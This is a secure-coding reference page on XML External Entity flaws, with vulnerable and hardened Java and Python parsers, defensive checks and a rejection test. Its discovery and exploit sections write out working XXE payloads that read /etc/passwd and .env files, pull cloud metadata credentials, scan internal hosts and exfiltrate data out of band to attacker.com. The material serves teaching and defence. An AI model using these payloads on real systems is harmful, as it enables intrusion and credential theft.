XML External Entity (XXE)
XML External Entity (XXE) at a glance
Overview
XXE happens when XML parsers expand entities defined in a DTD that point at external resources. Attackers embed SYSTEM or PUBLIC entities that reference files like /etc/passwd or internal HTTP endpoints. When the parser expands the entity, sensitive data can be disclosed or internal services contacted. The fix is to disable DTDs and external entity resolution and to run parsers with network access disabled.
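To make the mechanism concrete, here is a minimal sketch that lists the external entities a document declares without ever resolving them. It uses Python's standard `xml.parsers.expat` module; the function name `list_external_entities` and the sample payload are illustrative assumptions, not part of any product API.

```python
from xml.parsers import expat

PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<invoice><id>&xxe;</id></invoice>"""


def list_external_entities(xml_bytes):
    """Return (name, system_id) pairs for every external entity the document declares."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones carry a system identifier.
        if system_id is not None:
            found.append((name, system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is installed, so this parser only records
    # the declaration and does not read the referenced file or URL.
    parser.Parse(xml_bytes, True)
    return found


print(list_external_entities(PAYLOAD))
```

A vulnerable parser would go one step further and substitute the contents of the declared resource wherever `&xxe;` appears.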
Where it occurs
It occurs in file upload, XML processing, or integration endpoints like SOAP, SAML, or XML-to-JSON converters that use insecure parser settings or enable external entity resolution.
Impact
File disclosure, credential and key leakage, request forgery against internal hosts, and, in rare cases, code execution when the parser supports dangerous URI schemes (for example PHP's expect:// wrapper).
Prevention
Prevent XXE by rejecting XML when possible or using safe streaming parsers with DTDs and external entities disabled, empty resolvers, no network access, and strict time and size limits.
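One way to combine a size limit with DOCTYPE rejection is sketched below using only the Python standard library. The names `parse_untrusted`, `UnsafeXML`, and the 1 MB limit are assumptions chosen for illustration. The sketch does not enforce a time limit, which would need to be applied by the surrounding request handling.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

MAX_XML_BYTES = 1_000_000  # assumed limit; tune per endpoint


class UnsafeXML(ValueError):
    """Raised when untrusted XML is too large, malformed, or carries a DOCTYPE."""


def parse_untrusted(xml_bytes, max_bytes=MAX_XML_BYTES):
    if len(xml_bytes) > max_bytes:
        raise UnsafeXML("document exceeds size limit")

    def reject_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DOCTYPE declarations are not allowed")

    # First pass: expat calls this handler as soon as it meets <!DOCTYPE ...>,
    # before any entity declared inside it could be used.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = reject_doctype
    try:
        scanner.Parse(xml_bytes, True)
    except expat.ExpatError as exc:
        raise UnsafeXML(f"malformed XML: {exc}") from exc

    # Second pass: build the tree only after the document passed both checks.
    return ET.fromstring(xml_bytes)
```

Scanning first and parsing second costs an extra pass, but it keeps the rejection logic independent of whichever tree builder the application uses afterwards.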
Examples
DOM parser resolves external entities and allows file exfiltration
Default parser loads external entities from file or network.
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
// BUG: no hardening, external entities and DTD allowed by default on some impls
DocumentBuilder b = f.newDocumentBuilder();
Document doc = b.parse(req.getInputStream());
- Line 2: No features disabled, DTD and external entities may resolve
External entity references let attackers read files or make server-side requests during parsing.
DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
f.setFeature("http://xml.org/sax/features/external-general-entities", false);
f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
f.setXIncludeAware(false);
f.setExpandEntityReferences(false);
DocumentBuilder b = f.newDocumentBuilder();
// Optionally add a resolver that answers every external entity with empty content instead of fetching it
b.setEntityResolver((publicId, systemId) -> new InputSource(new StringReader("")));
Document doc = b.parse(req.getInputStream());
- Line 2: Disable DTD and both external entity features, set an EntityResolver that returns empty content
Disable DTDs and entity expansion entirely for untrusted XML.
Engineer Checklist
- Disallow doctype declarations in untrusted XML
- Disable external entity resolution and set a safe resolver
- Disable parser network access and set time and size limits
- Prefer JSON or simple formats for untrusted data paths
- Add tests that submit external entity payloads and expect rejection
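The last checklist item could look like the following `unittest` sketch. Here `parse_invoice` is a hypothetical stand-in for the parser under test, and `DoctypeForbidden` is an assumed exception name. In a real project the test case would import the application's own parsing function instead.

```python
import unittest
from xml.parsers import expat

XXE_PAYLOADS = [
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><invoice><id>&xxe;</id></invoice>',
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker.com/xxe-callback">]><invoice><id>&xxe;</id></invoice>',
    b'<!DOCTYPE data [<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;]><invoice><id>1</id></invoice>',
]


class DoctypeForbidden(ValueError):
    pass


def parse_invoice(xml_bytes):
    """Hypothetical parser under test: returns the <id> text and refuses any DOCTYPE."""
    chunks, inside_id = [], [False]

    def forbid_doctype(*_args):
        raise DoctypeForbidden("DOCTYPE not allowed")

    def start(name, attrs):
        inside_id[0] = name == "id"

    def end(name):
        inside_id[0] = False

    def chars(data):
        if inside_id[0]:
            chunks.append(data)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = forbid_doctype
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    parser.Parse(xml_bytes, True)
    return "".join(chunks)


class XXERejectionTest(unittest.TestCase):
    def test_payloads_are_rejected(self):
        for payload in XXE_PAYLOADS:
            with self.subTest(payload=payload):
                with self.assertRaises(DoctypeForbidden):
                    parse_invoice(payload)

    def test_plain_invoice_still_parses(self):
        self.assertEqual(parse_invoice(b"<invoice><id>INV-1</id></invoice>"), "INV-1")
```

Saved as a test module, this runs with `python -m unittest`. Keeping a positive case next to the payloads guards against a fix that simply rejects all XML.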
End-to-End Example
An upload endpoint parses invoices from XML using default parser settings. An attacker submits a document with a SYSTEM entity that reads a local file, which is then included in the parsed output.
// Java/Spring Boot - Vulnerable to XXE
import java.io.InputStream;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    // VULNERABLE: Using default DocumentBuilderFactory settings
    // Does NOT disable external entities or DTDs
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

    // DANGEROUS: These security features are NOT set!
    // factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    // factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    DocumentBuilder builder = factory.newDocumentBuilder();

    // VULNERABLE: Parses untrusted XML with external entities enabled
    // Attacker sends:
    // <?xml version="1.0"?>
    // <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
    // <invoice><id>&xxe;</id></invoice>
    Document doc = builder.parse(xmlInput);

    // Extract and return data (includes expanded external entities!)
    NodeList nodes = doc.getElementsByTagName("id");
    String invoiceId = nodes.item(0).getTextContent();
    return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
}
# Python/Flask + lxml - Also vulnerable
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    # VULNERABLE: parser is created without resolve_entities=False,
    # so lxml may expand external entities
    # Attacker sends:
    # <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    # <root><data>&xxe;</data></root>
    parser = etree.XMLParser()  # No resolve_entities=False!
    tree = etree.fromstring(xml_data, parser)
    result = tree.find('.//data').text
    return {'data': result}
// Java/Spring Boot - SECURE against XXE
import java.io.InputStream;
import java.io.StringReader;
import java.util.Map;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestBody;
import org.w3c.dom.Document;
import org.w3c.dom.NodeList;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;

@PostMapping("/api/upload-xml")
public ResponseEntity<?> uploadXml(@RequestBody InputStream xmlInput) throws Exception {
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
    // SECURE: Disable DTDs completely
    factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
    // SECURE: Disable external entities
    factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
    factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
    // SECURE: Disable external DTDs
    factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
    // SECURE: Disable XInclude processing
    factory.setXIncludeAware(false);
    // SECURE: Disable entity expansion
    factory.setExpandEntityReferences(false);

    DocumentBuilder builder = factory.newDocumentBuilder();
    // Set entity resolver that returns empty content for any external entity
    builder.setEntityResolver((publicId, systemId) ->
        new InputSource(new StringReader("")));

    try {
        Document doc = builder.parse(xmlInput);
        NodeList nodes = doc.getElementsByTagName("id");
        String invoiceId = nodes.item(0).getTextContent();
        return ResponseEntity.ok(Map.of("invoiceId", invoiceId));
    } catch (SAXException e) {
        // Thrown when a DOCTYPE is found (and for any other malformed XML)
        return ResponseEntity.badRequest()
            .body(Map.of("error", "Invalid XML: DOCTYPE not allowed"));
    }
}
# Python/Flask + lxml - SECURE
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route('/api/parse-xml', methods=['POST'])
def parse_xml():
    xml_data = request.data
    # SECURE: Disable entity resolution
    parser = etree.XMLParser(
        resolve_entities=False,  # Don't resolve external entities
        no_network=True,         # Disable network access
        dtd_validation=False,    # Don't validate against a DTD
        load_dtd=False           # Don't load DTDs
    )
    try:
        tree = etree.fromstring(xml_data, parser)
        # Reject the document if it carries a DOCTYPE
        if tree.getroottree().docinfo.doctype:
            return {'error': 'DOCTYPE not allowed'}, 400
        result = tree.find('.//data').text
        return {'data': result}
    except etree.XMLSyntaxError:
        return {'error': 'Invalid XML'}, 400

# ALTERNATIVE: Use JSON instead of XML when possible
@app.route('/api/upload-invoice', methods=['POST'])
def upload_invoice():
    # SECURE: Use JSON instead of XML to avoid XXE entirely
    data = request.get_json()
    invoice_id = data.get('id')
    return {'invoiceId': invoice_id}
Discovery
This vulnerability is discovered by submitting XML input containing external entity declarations and observing that the application processes them, either returning the entity content or exhibiting timing differences that confirm external resource access.
1. Test basic external entity
Submit XML with simple SYSTEM entity to test if external entities are processed
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname"> ]>
<invoice><id>&xxe;</id></invoice>
Response
Status: 200
Body: { "invoice_id": "prod-server-01\n", "message": "Invoice processed", "note": "Server hostname from /etc/hostname appears in response - XXE confirmed" }
Artifacts
xxe_confirmed entity_processing_enabled file_disclosure

2. Probe for sensitive file disclosure
Test file:// protocol access to read /etc/passwd
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data><content>&xxe;</content></data>
Response
Status: 200
Body: { "content": "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\napp-user:x:1000:1000::/home/app-user:/bin/bash\npostgres:x:999:999:PostgreSQL Server:/var/lib/postgresql:/bin/bash", "note": "Complete /etc/passwd file disclosed via XXE" }
Artifacts
passwd_file_disclosed system_users_enumerated file_access_confirmed

3. Test outbound HTTP via SSRF
Verify parser can make HTTP requests to external/internal hosts
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "http://attacker.com/xxe-callback"> ]>
<data><test>&xxe;</test></data>
Response
Status: 200
Body: { "message": "Processed", "note": "Attacker server logs show: [2024-01-15 10:23:45] GET /xxe-callback HTTP/1.1 from 52.143.12.89 (prod-server.example.com)" }
Artifacts
ssrf_confirmed outbound_http_allowed xxe_ssrf_vector

4. Test parameter entity for blind XXE
Use parameter entities to exfiltrate data via external DTD
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///app/.env">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
]>
<data>&send;</data>
Response
Status: 200
Body: { "message": "Processed", "note": "Attacker server receives: GET /exfil?data=DATABASE_URL%3Dpostgresql%3A%2F%2Fadmin%3APr0dP%40ss..." }
Artifacts
blind_xxe_confirmed data_exfiltration parameter_entity_processing
Exploit steps
An attacker exploits this by crafting XML payloads with external entity declarations that reference local files (file:///etc/passwd) or internal network resources, exfiltrating sensitive data or using the parser as an SSRF vector.
1. Extract application secrets
Read .env file containing database credentials and API keys
Use XXE to access application configuration files
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "file:///app/.env"> ]>
<invoice><notes>&xxe;</notes></invoice>
Response
Status: 200
Body: { "invoice_notes": "DATABASE_URL=postgresql://admin:Pr0dP@ssw0rd2024@db.internal.example.com:5432/production\nAWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\nAWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nSTRIPE_SECRET_KEY=sk_live_51HxYz3FGHxYz3FGHxYz3FG\nJWT_SECRET=super-secret-jwt-key-do-not-share\nREDIS_URL=redis://cache.internal.example.com:6379/0", "note": "Complete application secrets exposed via XXE file disclosure" }
Artifacts
database_credentials aws_credentials stripe_api_key jwt_secret redis_connection

2. Access cloud metadata service via SSRF
Exploit XXE to query AWS EC2 metadata for IAM credentials
Use XXE as SSRF vector to access cloud provider metadata
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role"> ]>
<data><creds>&xxe;</creds></data>
Response
Status: 200
Body: { "creds": "{\n \"Code\": \"Success\",\n \"LastUpdated\": \"2024-01-15T10:23:45Z\",\n \"Type\": \"AWS-HMAC\",\n \"AccessKeyId\": \"ASIATESTACCESSKEY123\",\n \"SecretAccessKey\": \"wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\",\n \"Token\": \"IQoJb3JpZ2luX2VjEHoaCXVzLWVhc3QtMSJIMEYCIQD...\",\n \"Expiration\": \"2024-01-15T16:23:45Z\"\n}", "note": "IAM role credentials with S3, RDS, and EC2 permissions exposed" }
Artifacts
iam_credentials aws_metadata_access cloud_service_compromise temporary_credentials

3. Exfiltrate via blind XXE
Use out-of-band XXE to exfiltrate sensitive files
Leverage parameter entities to send file contents to attacker server. The php://filter wrapper in this payload is only available when the XML is parsed by PHP; other stacks need a different way to encode the file.
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/app/config/database.yml">
<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
%dtd;
%send;
]>
<data></data>
Response
Status: 200
Body: { "message": "Processed", "attacker_log": "GET /exfil?f=cHJvZHVjdGlvbjoKICBhZGFwdGVyOiBwb3N0Z3Jlc3FsCiAgaG9zdDogZGIuaW50ZXJuYWwuZXhhbXBsZS5jb20...", "decoded": "production:\\n adapter: postgresql\\n host: db.internal.example.com\\n database: production\\n username: admin\\n password: Pr0dP@ssw0rd2024", "note": "Database configuration exfiltrated via blind XXE to attacker server" }
Artifacts
blind_xxe_exfiltration database_config_leaked base64_encoded_data out_of_band_channel

4. Enumerate internal network services
Use XXE SSRF to scan internal network and identify services
Probe internal IP ranges to map network topology
Request
POST https://api.example.com/api/upload-xml
Headers: Content-Type: application/xml
Body:
<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY xxe SYSTEM "http://10.0.0.5:6379/"> ]>
<data><service>&xxe;</service></data>
Response
Status: 200
Body: { "service": "-ERR wrong number of arguments for 'get' command\\r\\n", "note": "Redis server response at 10.0.0.5:6379 - internal service discovered", "additional_findings": { "10.0.0.3:5432": "PostgreSQL database server", "10.0.0.8:9200": "Elasticsearch cluster", "10.0.0.12:27017": "MongoDB instance", "10.0.1.50:8080": "Internal admin panel" } }
Artifacts
internal_network_map service_discovery redis_server_found attack_surface_expanded
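The payloads in these steps target local files, a link-local metadata address, a private-network host, and an attacker-controlled domain. When reviewing logged XML or triaging alerts, it can help to bucket SYSTEM identifiers by the kind of access they attempt. The following is a rough sketch under that assumption. `classify_system_id` and its labels are invented for illustration, and hostnames are not resolved.

```python
import ipaddress
from urllib.parse import urlsplit


def classify_system_id(system_id):
    """Label a SYSTEM identifier by the kind of resource it points at."""
    parts = urlsplit(system_id)
    scheme = parts.scheme.lower()
    if scheme in ("", "file"):
        return "local-file"
    if scheme not in ("http", "https", "ftp"):
        return "other-scheme"  # e.g. php://, jar:, expect://
    host = parts.hostname or ""
    try:
        address = ipaddress.ip_address(host)
    except ValueError:
        return "named-host"  # would need DNS resolution to judge further
    if address.is_link_local:
        return "link-local"  # includes the 169.254.169.254 metadata address
    if address.is_private or address.is_loopback:
        return "internal-address"
    return "public-address"


for target in (
    "file:///app/.env",
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/prod-ec2-role",
    "http://10.0.0.5:6379/",
    "http://attacker.com/evil.dtd",
):
    print(classify_system_id(target), target)
```

A label such as "named-host" is deliberately inconclusive: a public name can still resolve to an internal address, so this kind of check complements parser hardening and does not replace it.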
Specific Impact
Sensitive files and service metadata are exposed, which can include credentials or configuration needed to pivot deeper into the environment.
Attackers may chain this with SSRF to query internal HTTP-based services, leading to data theft or unauthorized operations against those services.
Fix
Harden the XML parser by prohibiting doctype declarations and turning off external entity resolution. Provide a resolver that returns empty input and, where possible, disable parser network access. Prefer simpler formats such as JSON for untrusted data.
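For Python's standard-library SAX parser, the same ideas might be sketched as follows. The helper names `parse_hardened`, `EmptyResolver`, and `TextCollector` are assumptions. The sketch turns off external entity handling and installs an empty resolver, but it does not reject DOCTYPE declarations, which would need a separate check.

```python
import io
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    EntityResolver,
    feature_external_ges,
    feature_external_pes,
)
from xml.sax.xmlreader import InputSource


class EmptyResolver(EntityResolver):
    """Answer every external entity lookup with an empty document."""

    def resolveEntity(self, public_id, system_id):
        source = InputSource()
        source.setByteStream(io.BytesIO(b""))
        return source


class TextCollector(ContentHandler):
    """Collect all character data so the caller can inspect what was parsed."""

    def __init__(self):
        super().__init__()
        self.text = []

    def characters(self, content):
        self.text.append(content)


def parse_hardened(xml_bytes):
    parser = xml.sax.make_parser()
    # Do not fetch external general or parameter entities.
    parser.setFeature(feature_external_ges, False)
    parser.setFeature(feature_external_pes, False)
    # Second line of defence in case entity handling is ever re-enabled.
    parser.setEntityResolver(EmptyResolver())
    collector = TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.text)
```

With these settings a reference such as `&xxe;` is skipped rather than expanded, so the collected text contains nothing from the referenced file.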